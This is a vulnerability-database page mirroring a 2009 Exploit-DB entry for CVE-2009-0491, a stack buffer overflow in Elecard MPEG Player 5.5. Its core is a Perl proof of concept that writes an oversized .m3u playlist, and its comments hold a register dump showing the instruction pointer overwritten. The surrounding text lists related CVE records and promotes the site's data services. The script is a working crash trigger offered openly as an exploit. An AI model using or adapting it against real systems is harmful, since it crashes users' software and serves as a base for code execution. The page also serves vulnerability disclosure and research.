Lucene search
+L

Elecard MPEG Player 5.5 - '.m3u' Stack Buffer Overflow (PoC)

🗓️ 01 Jan 2009 00:00:00Reported by aBo MoHaMeDType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

Elecard MPEG Player 5.5 Stack Buffer Overflow Po

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-0491
1 Jan 200900:00
circl
cve
CVE
CVE-2009-0491
10 Feb 200901:00
cve
cvelist
Cvelist
CVE-2009-0491
10 Feb 200901:00
cvelist
euvd
EUVD
EUVD-2009-0495
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-0491
10 Feb 200901:30
nvd
openvas
OpenVAS
Elecard MPEG Player Buffer Overflow Vulnerability
16 Feb 200900:00
openvas
openvas
OpenVAS
Elecard MPEG Player Buffer Overflow Vulnerability
16 Feb 200900:00
openvas
prion
Prion
Stack overflow
10 Feb 200901:30
prion
#!/usr/bin/perl -w

########################################################################
#Program  : Elecard MPEG Player
#Version  : 5.5 build 15884.081218
#website  : http://www.elecard.com/download/index.php
#Download : http://www.elecard.com/ftp/pub/mpeg/player/EMpgPlayer.zip
#Type     :  * (.M3U) Buffer Overflow POC
########################################################################

#EAX 00000000
#ECX 41414141
#EDX 7C9037D8 ntdll.7C9037D8
#EBX 00000000
#ESP 0012BE40
#EBP 0012BE60
#ESI 00000000
#EDI 00000000
#EIP 41414141
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDF000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0
#EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
#MM0 0020 0202 0000 001B
#MM1 015A F2BC 8986 2BC0
#MM2 011C 0000 4020 027F
#MM3 0000 0000 804D A735
#MM4 BADB 0D00 BF83 15E6
#MM5 8A1B EAB8 0000 0005
#MM6 0000 0000 0000 0000
#MM7 D1B7 1758 E219 6000




my $file="boom.m3u";


open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE "http://"."A" x 72850;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-01]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jan 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.05859
32